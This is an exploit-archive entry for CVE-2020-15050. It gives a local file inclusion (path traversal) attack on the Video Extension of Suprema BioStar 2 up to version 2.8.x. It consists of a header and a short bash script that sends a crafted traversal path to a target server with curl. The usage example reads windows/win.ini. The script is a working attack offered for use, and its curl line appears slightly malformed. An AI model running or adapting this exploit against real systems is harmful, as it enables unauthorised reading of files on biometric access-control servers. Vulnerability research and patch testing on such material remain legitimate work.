# Exploit Title: Bio Star 2.8.2 - Local File Inclusion # Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi) # Google Dork: N/A # Date of Exploit Release: 2020-07-13 # Exploit Author: SITE Team # Vendor Homepage: https://www.supremainc.com/en/main.asp # Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp # Version: Bio Star 2, Video Extension up to version 2.8.2 # Tested on: Windows # CVE : CVE-2020-15050 #!/bin/bash # Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit # Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi) # Google Dork: N/A # Date of Exploit Release: 13/7/2020 # Exploit Author: SITE Team # Vendor Homepage: https://www.supremainc.com/en/main.asp # Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp # Version: Bio Star 2, Video Extension up to version 2.8.1 # Tested on: Windows # CVE : CVE-2020-15050 echo "*********** SITE TEAM *********************" echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********" echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi*********************" if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini" echo "*******************************************" else args=("$@") curl -X GET --path-as-is -k${args[0]}${args[1]} fi |